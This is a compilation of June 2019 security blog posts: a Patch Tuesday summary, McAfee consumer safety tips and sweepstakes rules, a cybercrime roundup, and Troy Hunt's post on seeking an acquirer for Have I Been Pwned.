Using A Cluster-based approach for better detection – Quick Heal already uses machine learning to solve various cybersecurity problems using a cluster-based approach, illustrated in this whitepaper. Sample are clustered through machine learning with each cluster having samples similar to each other. These generated clusters are huge and processing them happens through machine learning where they are aggregated, analyzed and automated. The data is then labeled and processed to generate models. After scrutiny on numerous factors including time, size, quality, they are qualified for endpoint deployment.

Machine Learning and automation will be great weapons in the fight against advanced cybersecurity threats but it also need to be backed up with a combination of data science and human expertise.

 

The post Harnessing Machine Learning and Automation against Advanced Threats appeared first on Seqrite Blog.

Microsoft Patch Tuesday, June 2019 Edition

Microsoft on Tuesday released updates to fix 88 security vulnerabilities in its Windows operating systems and related software. The most dangerous of these include four flaws for which there is already exploit code available. There’s also a scary bug affecting all versions of Microsoft Office that can be triggered by a malicious link or attachment. And of course Adobe has its customary monthly security update for Flash Player.

Microsoft says it has so far seen no exploitation against any of the four flaws that were disclosed publicly prior to their patching this week — nor against any of the 88 bugs quashed in this month’s release. All four are privilege escalation flaws: CVE-2019-1064 and CVE-2019-1069 affect Windows 10 and later; CVE-2019-1053 and CVE-2019-0973 both affect all currently supported versions of Windows.

Most of the critical vulnerabilities — those that can be exploited by malware or miscreants to infect systems without any action on the part of the user — are present in Microsoft’s browsers Internet Explorer and Edge.

According to Allan Liska, senior solutions architect at Recorded Future, serious vulnerabilities in this month’s patch batch reside in Microsoft Word (CVE-2019-1034 and CVE-2019-1035).

“This is another memory corruption vulnerability that requires an attacker to send a specially crafted Microsoft Word document for a victim to open, alternatively an attacker could convince a victim to click on a link to a website hosting a malicious Microsoft Word document,” Liska wrote. “This vulnerability affects all versions of Microsoft Word on Windows and Mac as well as Office 365. Given that Microsoft Word Documents are a favorite exploitation tool of cybercriminals, if this vulnerability is reverse engineered it could be widely exploited.”

Microsoft also pushed an update to plug a single critical security hole in Adobe’s Flash Player software, which is waning in use but it still is a target for malware purveyors. Google Chrome auto-updates Flash but also is now making users explicitly enable Flash every time they want to use it. By the summer of 2019 Google will make Chrome users go into their settings to enable it every time they want to run it.

Firefox also forces users with the Flash add-on installed to click in order to play Flash content; instructions for disabling or removing Flash from Firefox are here. Adobe will stop supporting Flash at the end of 2020.

Note that Windows 10 likes to install patches all in one go and reboot your computer on its own schedule. Microsoft doesn’t make it easy for Windows 10 users to change this setting, but it is possible. For all other Windows OS users, if you’d rather be alerted to new updates when they’re available so you can choose when to install them, there’s a setting for that in Windows Update. To get there, click the Windows key on your keyboard and type “windows update” into the box that pops up.

Staying up-to-date on Windows patches is good. Updating only after you’ve backed up your important data and files is even better. A good backup means you’re not pulling your hair out if the odd buggy patch causes problems booting the system. So do yourself a favor and backup your files before installing any patches.

As always, if you experience any problems installing any of the patches this month, please feel free to leave a comment about it below; there’s a good chance other readers have experienced the same and may even chime in here with some helpful tips.

Additional reading:

Martin Brinkmann’s take at Ghacks.net

Qualys on Patch Tuesday

SANS’s quick reference by severity

Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel

With summertime just around the corner, families are eagerly looking to book their next getaway. Since vacation is so top-of-mind during the summer months, users are bound to come across websites offering cheap deals on flights, accommodations, and other experiences and activities. With so many websites claiming to offer these “can’t-miss deals,” how do you know who to trust?

It turns out that this is a common concern among folks looking for a little summer getaway. According to our recent survey of 8,000 people across the UK, US, Canada, Australia, France, Germany, Spain, and Singapore, 54% of respondents worry about their identity being stolen while booking and purchasing travel and accommodation online. However, 27% don’t check the authenticity of a website before booking their vacation online. Over half of these respondents say that it doesn’t cross their minds to do so.

These so-called “great deals” can be difficult to pass up. Unfortunately, 30% of respondents have been defrauded thanks to holiday travel deals that were just too good to be true. What’s more, 46.3% of these victims didn’t realize they had been ripped off until they arrived at their holiday rental to find that the booking wasn’t actually valid.

In addition to avoiding bogus bookings, users should also refrain from risky online behavior while enjoying their summer holidays. According to our survey, 44.5% of respondents are putting themselves at risk while traveling by not checking the security of their internet connection or willingly connecting to an unsecured network. 61% also stated that they never use a VPN, while 22% don’t know what a VPN is.

Unfortunately, travel-related attacks aren’t limited to just travelers either; hotels are popular targets for cybercriminals. According to analysis conducted by the McAfee Advanced Threat Research team, the most popular attack vectors are POS malware and account hijacking. Due to these attacks, eager vacationers have had their customer payment, credit card data, and personally identifiable information stolen. In order for users to enjoy a worry-free vacation this summer, it’s important that they are aware of the potential cyberthreats involved when booking their trips online and what they can do to prevent them.

We here at McAfee are working to help inform users of the risks they face when booking through unsecured or unreliable websites as well as when they’re enjoying some summertime R&R. Check out the following tips so you can enjoy your vacation without questioning the status of your cybersecurity:

  • Always connect with caution. If you need to conduct transactions on a public Wi-Fi connection, use a virtual private network (VPN) to help keep your connection secure.
  • Think before you click. Often times, cybercriminals use phishing emails or fake sites to lure consumers into clicking links for products or services that could lead to malware. If you receive an email asking you to click on a link with a suspicious URL, it’s best to avoid interacting with the message altogether.
  • Browse with security protection. Use a comprehensive security solution, like McAfee Total Protection, which includes McAfee WebAdvisor that can help identify malicious websites.
  • Utilize an identity theft solution. With all this personal data floating around online, it’s important to stay aware of any attempts to steal your identity. Use an identity theft solution, such as McAfee Identity Theft Protection, that can help protect personally identifiable information from identity theft and fraud.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel appeared first on McAfee Blogs.

1.1M Emuparadise Accounts Exposed in Data Breach

If you’re an avid gamer or know someone who is, you might be familiar with the retro gaming site Emuparadise. This website boasts a large community, a vast collection of gaming music, game-related videos, game guides, magazines, comics, video game translations, and more. Unfortunately, news just broke that Emuparadise recently suffered a data breach in April 2018, exposing the data of about 1.1 million of their forum members.

The operators of the hacked-database search engine, DeHashed, shared this compromised data with the data breach reference site Have I Been Pwned. According to the site’s owner Troy Hunt, the breach impacted 1,131,229 accounts and involved stolen email addresses, IP addresses, usernames, and passwords stored as salted MD5 hashes. Password salting is a process of securing passwords by inputting unique, random data to users’ passwords. However, the MD5 algorithm is no longer considered sufficient for protecting passwords, creating cause for cybersecurity concern.

Emuparadise forced a credential reset after the breach occurred in April 2018. It’s important that users of Emuparadise games take steps to help protect their private information. If you know someone who’s an avid gamer, pass along the following tips to help safeguard their security:

  • Change up your password. If you have an Emuparadise account, you should change up your account password and email password immediately. Make sure the next one you create is strong and unique so it’s more difficult for cybercriminals to crack. Include numbers, lowercase and uppercase letters, and symbols. The more complex your password is, the better!
  • Keep an eye out for sketchy emails and messages. Cybercriminals can leverage stolen information for phishing emails and social engineering scams. If you see something sketchy or from an unknown source in your email inbox, be sure to avoid clicking on any links provided.
  • Check to see if you’ve been affected. If you or someone you know has made an Emuparadise account, use this tool to check if you could have been potentially affected.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 1.1M Emuparadise Accounts Exposed in Data Breach appeared first on McAfee Blogs.

CCPA is a Shiny Object

The California Consumer Protection Act has gotten a lot of attention recently and rightly so. It is, however, just one of a number of US state privacy legislation initiatives that have either recently been passed or is under consideration. Consider the Maine Act to Protect the Privacy of Online Consumer Information. This law requires that […]

The post CCPA is a Shiny Object appeared first on Privacy Ref Blog.

Say So Long to Robocalls

For as long as you’ve had a phone, you’ve probably experienced in one form or another a robocall. These days it seems like they are only becoming more prevalent too. In fact, it was recently reported that robocall scams surged to 85 million globally, up 325% from 2017. While these scams vary by country, the most common type features the impersonation of legitimate organizations — like global tech companies, big banks, or the IRS — with the goal of acquiring user data and money. When a robocall hits, users need to be careful to ensure their personal information is protected.

It’s almost impossible not to feel anxious when receiving a robocall. Whether the calls are just annoying, or a cybercriminal uses the call to scam consumers out of cash or information, this scheme is a big headache for all. To combat robocalls, there has been an uptick in apps and government intervention dedicated to fighting this ever-present annoyance. Unfortunately, things don’t seem to be getting better — while some savvy users are successful at avoiding these schemes, there are still plenty of other vulnerable targets.

Falling into a cybercriminal’s robocall trap can happen for a few reasons. First off, many users don’t know that if they answer a robocall, they may trigger more as a result. That’s because, once a user answers, hackers know there is someone on the other end of the phone line and they have an incentive to keep calling. Cybercriminals also have the ability to spoof numbers, mimic voices, and provide “concrete” background information that makes them sound legitimate. Lastly, it might surprise you to learn that robocalls are actually perfectly legal. It starts to become a grey area, however, when calls come through from predatory callers who are operating on a not-so-legal basis.

While government agencies, like the Federal Communications Commission and Federal Trade Commission, do their part to curb robocalls, the fight to stop robocalls is far from over, and more can always be done. Here are some proactive ways you can say so long to pesky scammers calling your phone.

  1. There’s an app for that. Consider downloading the app Robokiller that will stop robocalls before you even pick up. The app’s block list is constantly updating, so you’re protected.
  2. Let unknown calls go to voicemail. Unless you recognize the number, don’t answer your phone.
  3. Never share personal details over the phone. Unfortunately, there’s a chance that cybercriminals may have previously obtained some of your personal information from other sources to bolster their scheme. However, do not provide any further personal or financial information over the phone, like SSNs or credit card information.
  4. Register for the FCC’s “Do Not Call” list. This can help keep you protected from cybercriminals and telemarketers alike by keeping your number off of their lists.
  5. Consider a comprehensive mobile security platform. Utilize the call blocker capability feature from McAfee Mobile Security. This tool can help reduce the number of calls that come through.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post Say So Long to Robocalls appeared first on McAfee Blogs.

Security roundup: June 2019

Every month, we dig through cybersecurity trends and advice for our readers. This edition: GDPR+1, the cost of cybercrime revealed, and a ransomware racket.

If you notice this notice…

If year one of GDPR has taught us anything, it’s that we can expect more data breach reports, which means more notifications. Most national supervisory authorities saw an increase in queries and complaints compared to 2017, the European Data Protection Board found.

But are companies following through with breach notifications that are effective, and easy to understand? Possibly not. Researchers from the University of Michigan analysed 161 sample notifications using readability guidelines, and found confusing language that doesn’t clarify whether consumers’ private data is at risk.

The researchers had previously found that people often don’t take action after being informed of a data breach. Their new findings suggest a possible connection with poorly worded notifications. That’s why the report recommends three steps for creating more usable and informative breach notifications.

  • Pay more attention to visual attractiveness (headings, lists and text formatting) and visually highlight key information.
  • Make the notice readable and understandable to everyone by using short sentences, common words (and very little jargon), and by not including unnecessary information.
  • Avoid hedge terms and wording claims like “there is no evidence of misuse”, because consumers could misinterpret this as as evidence of absence of risk).

AT&T inadvertently gave an insight into its own communications process after mistakenly publishing a data breach notice recently. Vice Motherboard picked up the story, and pointed out that its actions would have alarmed some users. But it also reckoned AT&T deserves praise for having a placeholder page ready in case of a real breach. Hear, hear. At BH Consulting, we’re big advocates of advance planning for potential incidents.

The cost of cybercrime, updated

Around half of all property crime is now online, when measured by volume and value. That’s the key takeaway from a new academic paper on the cost of cybercrime. A team of nine researchers from Europe and the USA originally published work on this field in 2012 and wanted to evaluate what’s changed. Since then, consumers have moved en masse to smartphones over PCs, but the pattern of cybercrime is much the same.

The body of the report looks at what’s known about the various types of crime and what’s changed since 2012. It covers online card frauds, ransomware and cryptocrime, fake antivirus and tech support scams, business email compromise, telecoms fraud along with other related crimes. Some of these crimes have become more prominent, and there’s also been fallout from cyberweapons like the NotPetya worm. It’s not all bad news: crimes that infringe intellectual property are down since 2012.

Ross Anderson, professor of security engineering at Cambridge University and a contributor to the research, has written a short summary. The full 32-page study is free to download as a PDF here.

Meanwhile, one expert has estimated fraud and cybercrime costs Irish businesses and the State a staggering €3.5bn per year. Dermot Shea, chief of detectives with the NYPD, said the law is often behind criminals. His sentiments match those of the researchers above. They concluded: “The core problem is that many cybercriminals operate with near-complete impunity… we should certainly spend an awful lot more on catching and punishing the perpetrators.” Speaking of which, Europol released an infographic showing how the GozNym criminal network operated, following the arrest of 10 people connected with the gang.

Ransom-go-round

Any ransomware victim will know that their options are limited: restore inaccessible data from backups (assuming they exist), or grudgingly pay the criminals because they need that data badly. The perpetrators often impose time limits to amp up the psychological squeeze, making marks feel like they have no other choice.

Enter third-party companies that claim to recover data on victims’ behalf. Could be a pricey but risk-free option? It turns out, maybe not. If it sounds too good to be true, it probably is. And that’s just what some top-quality sleuthing by ProPublica unearthed. It found two companies that just paid the ransom and pocketed the profit, without telling law enforcement or their customers.

This is important because ransomware is showing no signs of stopping. Fortinet’s latest Q1 2019 global threat report said these types of attacks are becoming targeted. Criminals are customising some variants to go after high-value targets and to gain privileged access to the network. Figures from Microsoft suggest ransomware infection levels in Ireland dropped by 60 per cent. Our own Brian Honan cautioned that last year’s figures might look good just because 2017 was a blockbuster year that featured WannaCry and NotPetya.

Links we liked

Finally, here are some cybersecurity stories, articles, think pieces and research we enjoyed reading over the past month.

If you confuse them, you lose them: a post about clear security communication. MORE

This detailed Wired report suggests Bluetooth’s complexity is making it hard to secure. MORE

Got an idea for a cybersecurity company? ENISA has published expert help for startups. MORE

A cybersecurity apprenticeship aims to provide a talent pipeline for employers. MORE

Remember the Mirai botnet malware for DDoS attacks? There’s a new variant in town. MORE

The hacker and pentester Tinker shares his experience in a revealing interview. MORE

So it turns out most hackers for hire are just scammers. MORE

The cybersecurity landscape and the role of the military. MORE

What are you doing this afternoon? Just deleting my private information from the web. MORE

The post Security roundup: June 2019 appeared first on BH Consulting.

Project Svalbard: The Future of Have I Been Pwned

Project Svalbard: The Future of Have I Been Pwned

Back in 2013, I was beginning to get the sense that data breaches were becoming a big thing. The prevalence of them seemed to be really ramping up as was the impact they were having on those of us that found ourselves in them, myself included. Increasingly, I was writing about what I thought was a pretty fascinating segment of the infosec industry; password reuse across Gawker and Twitter resulting in a breach of the former sending Acai berry spam via the latter. Sony Pictures passwords being, well, precisely the kind of terrible passwords we expect people to use but hey, actually seeing them for yourself is still shocking. And while I'm on Sony, the prevalence with which their users applied the same password to their Yahoo! accounts (59% of common email addresses had exactly the same password).

Around this time the Adobe data breach happened and that got me really interested in this segment of the industry, not least because I was in there. Twice. Most significantly though, it contained 153M other people which was a massive incident, even by today’s standards. All of these things combined – the prevalence of breaches, the analysis I was doing and the scale of Adobe – got me thinking: I wonder how many people know? Do they realise they were breached? Do they realise how many times they were breached? And perhaps most importantly, have they changed their password (yes, almost always singular) across the other services they use? And so Have I Been Pwned was born.

I’ll save the history lesson for the years between then and today because there are presently 106 blog posts with the HIBP tag you can go and read if you’re interested, let me just talk briefly about where the service is at today. It has almost 8B breached records, there are nearly 3M people subscribed to notifications, I’ve emailed those folks about a breach 7M times, there are 120k people monitoring domains they’ve done 230k searches for and I’ve emailed them another 1.1M times. There are 150k unique visitors to the site on a normal day, 10M on an abnormal day, another couple of million API hits to the breach API and then 10M a day to Pwned Passwords. Except even that number is getting smashed these days:

Oh – and as I’ve written before, commercial subscribers that depend on HIBP to do everything from alert members of identity theft programs to enable infosec companies to provide services to their customers to protecting large online assets from credential stuffing attacks to preventing fraudulent financial transactions and on and on. And there are the governments around the world using it to protect their departments, the law enforcement agencies leveraging it for their investigations and all sorts of other use cases I never, ever saw coming (my legitimisation of HIBP post from last year has a heap of other examples). And to date, every line of code, every configuration and every breached record has been handled by me alone. There is no “HIBP team”, there’s one guy keeping the whole thing afloat.

When I wanted an infographic to explain the architecture, I sat there and built the whole thing myself by hand. I manually sourced every single logo of a pwned company, cropping it, resizing it and optimising it. Each and every disclosure to an organisation that didn't even know their data was out there fell to me (and trust me, that's massively time-consuming and has proven to be the single biggest bottleneck to loading new data). Every media interview, every support request and frankly, pretty much every single thing you could possibly conceive of was done by just one person in their spare time. This isn't just a workload issues either; I was becoming increasingly conscious of the fact that I was the single point of failure. And that needs to change.

It's Time to Grow Up

That was a long intro but I wanted to set the scene before I got to the point of this blog post: it’s time for HIBP to grow up. It’s time to go from that one guy doing what he can in his available time to a better-resourced and better-funded structure that's able to do way more than what I ever could on my own. To better understand why I’m writing this now, let me share an image from Google Analytics:

Project Svalbard: The Future of Have I Been Pwned

That graph is the 12 months to Jan 18 this year and the spike corresponds with the loading of the Collection #1 credential stuffing list. It also corresponds with the day I headed off to Europe for a couple of weeks of “business as usual” conferences, preceded by several days of hanging out with my 9-year old son and good friends in a log cabin in the Norwegian snow. I was being simultaneously bombarded by an unprecedented level of emails, tweets, phone calls and every other imaginable channel due to the huge attention HIBP was getting around the world, and also turning things off, sitting by a little fireplace in the snow and enjoying good drinks and good conversation. At that moment, I realised I was getting very close to burn-out. I was pretty confident I wasn’t actually burned out yet, but I also became aware I could see that point in the not too distant future if I didn’t make some important changes in my life. (I’d love to talk more about that in the future as there are some pretty significant lessons in there, but for now, I just want to set the context as to the timing and talk about what happens next.) All of this was going on at the same time as me travelling the world, speaking at events, running workshops and doing a gazillion other things just to keep life ticking along.

To be completely honest, it's been an enormously stressful year dealing with it all. The extra attention HIBP started getting in Jan never returned to 2018 levels, it just kept growing and growing. I made various changes to adjust to the workload, perhaps one of the most publicly obvious being a massive decline in engagement over social media, especially Twitter:

Project Svalbard: The Future of Have I Been Pwned

Up until (and including) December last year in that graph, I was tweeting an average of 1,141 times per month (for some reason, Twitter's export feature didn't include May and June 2017 and only half of July so I've dropped those months from the graph). From Feb to May this year, that number has dropped to 315 so I've backed off social to the tune of 72% since January. That may seem like a frivolous fact to focus on, but it's a quantifiable number that's directly attributable to the impact the growth of HIBP was having on my life. Same again if you look at my blog post cadence; I've religiously maintained my weekly update videos but have had to cut way back on all the other technical posts I've otherwise so loved writing over the last decade.

After I got home from that trip, I started having some casual conversations with a couple of organisations I thought might be interested in acquiring HIBP. These were chats with people I already knew in places I respected so it was a low-friction “put out the feelers” sort of situation. It’s not the first time I’d had discussions like this – I’d done this several times before in response to organisations reaching out and asking what my appetite for acquisition was like – but it was the first time since the overhead of managing the service had gone off the charts. There was genuine enthusiasm which is great, but I quickly realised that when it comes to discussions of this nature, I was in well over my head. Sure, I can handle billions of breached records and single-handedly run a massive online data breach services that’s been used by hundreds of millions of people, but this was a whole different ballgame. It was time to get help.

Project Svalbard

Back in April during a regular catchup with the folks at KPMG about some otherwise mundane financial stuff (I've met with advisers regularly as my own financial state became more complex), they suggested I have a chat with their Mergers and Acquisition (M&A) practice about finding a new home for HIBP. I was comfy doing that; we have a long relationship and they understand not just HIBP, but the broader spectrum of the cyber things I do day to day. It wasn't a hard decision to make - I needed help and they had the right experience and the right expertise.

In meeting with the M&A folks, it quickly became apparent how much support I really needed. The most significant thing that comes to mind is that I'd never really taken the time just to step back and look at what HIBP actually does. That might sound odd, but as it's grown organically over the years and I've built it out in response to a combination of what I think it should do and where the demand is, I've not taken the time to step back and look at the whole thing holistically. Nor have I taken enough time to look at what it could do; I'm going to talk more about that later in this post, but there's so much potential to do so much more and I really needed the support of people that specialise in finding the value in a business to help me see that.

One of the first tasks was to come up with a project name for the acquisition because apparently, that's what you do with these things. There were many horribly kitschy options and many others that leaned on overused infosec buzzwords, and then I had a thought: what's that massive repository of seeds up in the Arctic Circle? I'd seen references to it before and the idea of a huge vault stockpiling something valuable for the betterment of humanity started to really resonate. Turns out the place is called Svalbard and it looks like this:

Project Svalbard: The Future of Have I Been Pwned

Also turns out the place is part of Norway and all these things combined started to make it sound like a befitting name, beginning with the obvious analogy of storing a massive quantity of "units". There's a neat video from a few years ago which talks about the capacity being about a billion seeds; not quite as many records as are in HIBP, but you get the idea. Then there's the name: it's a bit weird and hard to pronounce for those not familiar with it (although this video helps), kinda like... pwned. And finally, Norway has a lot of significance for me being the first international talk I did almost 5 years ago to the day. I spoke in front of an overflowing room and as the audience exited, every single one of them dropped a green rating card into the box.

That was an absolute turning point in my career. It was also in Norway this January that HIBP went nuts as you saw in the earlier graph. It was there in that little log cabin in the snow that I realised it was time for HIBP to grow up. And by pure coincidence, I'm posting this today from Norway, back again for my 6th year in a row of NDC Oslo. So as you can see, Svalbard feels like a fitting name 🙂

My Commitments for the Future of HIBP

So what does it mean if HIBP is acquired by another company? In all honesty, I don't know precisely what that will look like so let me just candidly share my thoughts on it as they stand today and there are a few really important points I want to emphasise:

  1. Freely available consumer searches should remain freely available. The service became this successful because I made sure there were no barriers in the way for people searching their data and I absolutely, positively want that to remain the status quo. That's number 1 on the list here for a reason.
  2. I'll remain a part of HIBP. I fully intend to be part of the acquisition, that is some company gets me along with the project. HIBP's brand is intrinsically tied to mine and at present, it needs me to go along with it.
  3. I want to build out much, much more capabilities wise. There's a heap of things I want to do with HIBP which I simply couldn't do on my own. This is a project with enormous potential beyond what it's already achieved and I want to be the guy driving that forward.
  4. I want to reach a much larger audience than I do at present. The numbers are massive as they are, but it's still only a tiny slice of the online community that's learning of their exposure in data breaches.
  5. There's much more that can be done to change consumer behaviour. Credential stuffing, for example, is a massive problem right now and it only exists due to password reuse. I want HIBP to play a much bigger role in changing the behaviour of how people manage their online accounts.
  6. Organisations can benefit much more from HIBP. Following on from the previous point, the services people are using can do a much better job of protecting their customers from this form of attack and data from HIBP can (and for some organisations, already does) play a significant role in that.
  7. There should be more disclosure - and more data. I mentioned earlier how responsible disclosure was massively burdensome and Svalbard gives me the chance to fix that. There's a whole heap of organisations out there that don't know they've been breached simply because I haven't had the bandwidth to deal with it all.

In considering which organisations are best positioned to help me achieve this, there's a solid selection that are at the front of my mind. There's also a bunch that I have enormous respect for but are less well-equipped to help me achieve this. As the process plays out, I'll be working with KPMG to more clearly identify which organisations fit into the first category. As I'm sure you can imagine, there are some very serious discussions to be had: where HIBP would fit into the organisation, how they'd help me achieve those bullet-pointed objectives above and frankly, whether it's the right place for such a valuable service to go. There are also some major personal considerations for me including who I'd feel comfortable working with, the impact on travel and family and, of course, the financial side of the whole thing. I'll be honest - it's equal parts daunting and exciting.

Last week I began contacting each stakeholder that would have an interest in the outcome of Project Svalbard before making it public in this blog post. I explained the drivers behind it and the intention for this exercise to make HIBP not just more sustainable, but also for it to make a much bigger impact on the data breach landscape. This has already led to some really productive discussions with organisations that could help HIBP make a much more positive impact on the industry. There's been a lot of enthusiasm and support for this process which is reassuring.

One question I expect I'll get is "why don't I turn it into a more formal, commercially-centric structure and just hire people?" I've certainly had that opportunity for some time either by funding it myself or via the various VCs that have come knocking over the years. The main reason I decided not to go down that path is that it massively increases my responsibilities at a time where I really need to reduce the burden on me. As of today, I can't just switch off for a week and frankly, if I tried even for a day I'd be worried about missing something important. In time, building up a company myself might allow me to do that but only after investing a substantial amount of time (and money) which is just not something I want to do at this point.

Summary

I'm enormously excited about the potential of Project Svalbard. In those early discussions with other organisations, I'm already starting to see a pattern emerge around better managing the entire data breach ecosystem. Imagine a future where I'm able to source and process much more data, proactively reach out to impacted organisations, guide them through the process of handling the incident, ensure impacted individuals like you and me better understand our exposure (and what to do about it) and ultimately, reduce the impact of data breaches on organisations and consumers alike. And it goes much further than that too because there's a lot more that can be done post-breach, especially to tackle attacks such as the huge rate of credential stuffing we're seeing these days. I'm really happy with what HIBP has been able to do to date, but I've only scratched the surface of potential with it so far.

I've made this decision at a time where I have complete control of the process. I'm not under any duress (not beyond the high workload, that is) and I've got time to let the acquisition search play out organically and allow it to find the best possible match for the project. And as I've always done with HIBP, I'm proceeding with complete transparency by detailing that process here. I'm really conscious of the trust that people have put in me with this service and every single day I'm reminded of the responsibility that brings with it.

HIBP may only be less than 6 years old, but it’s the culmination of a life’s work. I still have these vivid memories stretching back to the mid-90's when I first started building software for the web and had a dream of creating something big; “Isn’t it amazing that I can sit here at home and write code that could have a real impact on the world one day”. I had a few false starts along the way and it took a combination of data breaches, cloud and an independent career that allowed me the opportunity to make HIBP what it is today, but it's finally what I'd always hoped I'd be able to do. Project Svalbard is the realisation of that dream and I'm enormously excited about the opportunities that will come as a result.

Have Fun in the Sun this Summer with the Summer Safety #RT2Win Sweepstakes!

The school year has come to an end, and with it comes the start of summer! For many, this time of year brings excitement and anticipation to jet-set off to their favorite destinations and spend some quality time with family. But while many are soaking up the sun or sharing fun photos online, cybercriminals also trying to target those not taking the proper precautions to protect their data.

In fact, according to recent research by McAfee, only 40% of people are concerned about their personal photos being hacked, and 3x more concerned about their Social Security number being hacked than their photos. Whether booking travel deals or sharing photos on social media, device security should be top of mind to keep information secure this summer.

Whether you’re laying by the pool or dipping your toes in the sand, we want to help you leave your cybersecurity woes behind with our Summer Safety #RT2Win sweepstakes! Two [2] lucky winners of the sweepstakes drawing will receive a $500 Amazon gift card. The best part? Entering is a breeze! Follow the instructions below to enter and good luck!

#RT2Win Sweepstakes Official Rules

  • To enter, follow @McAfee_Home on Twitter and find the #RT2Win sweepstakes tweet.
  • The sweepstakes tweet will be released on Monday, June 10, 2019, at 12:00pm PST. This tweet will include the hashtags: #ProtectWhatMatters, #RT2Win AND #Sweepstakes.
  • Retweet the sweepstakes tweet released on the above date, from your own handle. The #ProtectWhatMatters, #RT2Win AND #Sweepstakes hashtags must be included in order to be entered.
  • Make sure you’re following @McAfee_Home on Twitter! You must follow for your entry to count.
  • Sweepstakes will end on Sunday, June 23, 2019 at 11:59pm PST. All entries must be made before that date and time.
  • Winners will be notified on Tuesday, June 25, 2019 via Twitter direct message.
  • Limit one entry per person.

1. How to Win:

Retweet one of our contest tweets on @McAfee_Home that include “#ProtectWhatMatters, #RT2Win, AND #Sweepstakes” for a chance to win a $500 Amazon gift card (for full prize details please see “Prizes” section below). Two [2] total winners will be selected and announced on June 25, 2019. Winners will be notified by direct message on Twitter. For full Sweepstakes details, please see the Terms and Conditions, below.

#RT2Win Sweepstakes Terms and Conditions

2. How to Enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee Summer Safety #RT2Win Sweepstakes will be conducted from June 10, 2019 through June 23, 2019. All entries for each day of the McAfee Summer Safety Cybersecurity #RT2Win Sweepstakes must be received during the time allotted for the McAfee Summer Safety #RT2Win Sweepstakes. Pacific Daylight Time shall control the McAfee Summer Safety Shopping #RT2Win Sweepstakes, duration is as follows:

  • Begins: Monday, June 10, 2019­­ at 12:00pm PST
  • Ends: Sunday, June 23, 2019 at 11:59pm PST
  • Two [2] winners will be announced: Tuesday, June 25, 2019

For the McAfee Summer Safety #RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the McAfee Summer Safety #RT2Win Sweepstakes:

  1. Follow @McAfee_Home on Twitter.
  2. Find the sweepstakes tweet of the day posted on @McAfee_Home which will include the hashtags: #ProtectWhatMatters, #RT2Win and #Sweepstakes.
  3. Retweet the sweepstakes tweet of the day and make sure it includes the #ProtectWhatMatters, #RT2Win, and hashtags.
  4. Note: Tweets that do not contain the #ProtectWhatMatters, #RT2Win, and #Sweepstakes hashtags will not be considered for entry.
  5. Limit one entry per person.

Two [2] winners will be chosen for the McAfee Summer Safety #RT2Win Sweepstakes tweet from the viable pool of entries that retweeted and included #ProtectWhatMatters, #RT2Win and #Sweepstakes. McAfee and the McAfee social team will choose winners from all the viable entries. The winners will be announced and privately messaged on Tuesday, June 25, 2019 on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes.

3. Eligibility: 

McAfee Summer Safety #RT2Win Sweepstakes is open to all legal residents of the 50 United States who are 18 years of age or older on the dates of the McAfee Summer Safety #RT2Win Sweepstakes begins and live in a jurisdiction where this prize and McAfee Summer Safety #RT2Win Sweepstakes not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

4. Winner Selection:

Winners will be selected at random from all eligible retweets received during the McAfee Summer Safety #RT2Win Sweepstakes drawing entry period. Sponsor will select the names of two [2] potential winners of the prizes in a random drawing from among all eligible submissions at the address listed below. The odds of winning depend on the number of eligible entries received. By participating, entrants agree to be bound by the Official McAfee Summer Safety #RT2Win Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

5. Winner Notification: 

Each winner will be notified via direct message (“DM”) on Twitter.com by June 25, 2019. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited, and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

6. Prizes: 

The prize for the McAfee Summer Safety #RT2Win Sweepstakes is a $500 Amazon gift card for each of the two [2] entrants/winners. Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Summer Safety #RT2Win Sweepstakes and all matters or disputes arising from the McAfee Summer Safety #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor. Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

Limit one (1) prize per person/household. Prizes are non-transferable, and no cash equivalent or substitution of prize is offered. The McAfee Summer Safety #RT2Win Sweepstakes has no affiliation with Amazon.

7. General Conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner. Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the McAfee Summer Safety #RT2Win Sweepstakes, or by any technical or human error, which may occur in the processing of the McAfee Summer Safety #RT2Win Sweepstakes. entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the McAfee Summer Safety #RT2Win Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any McAfee Summer Safety #RT2Win Sweepstakes -related activity, or participation in the McAfee Summer Safety #RT2Win Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

8. Limitations of Liability; Releases:

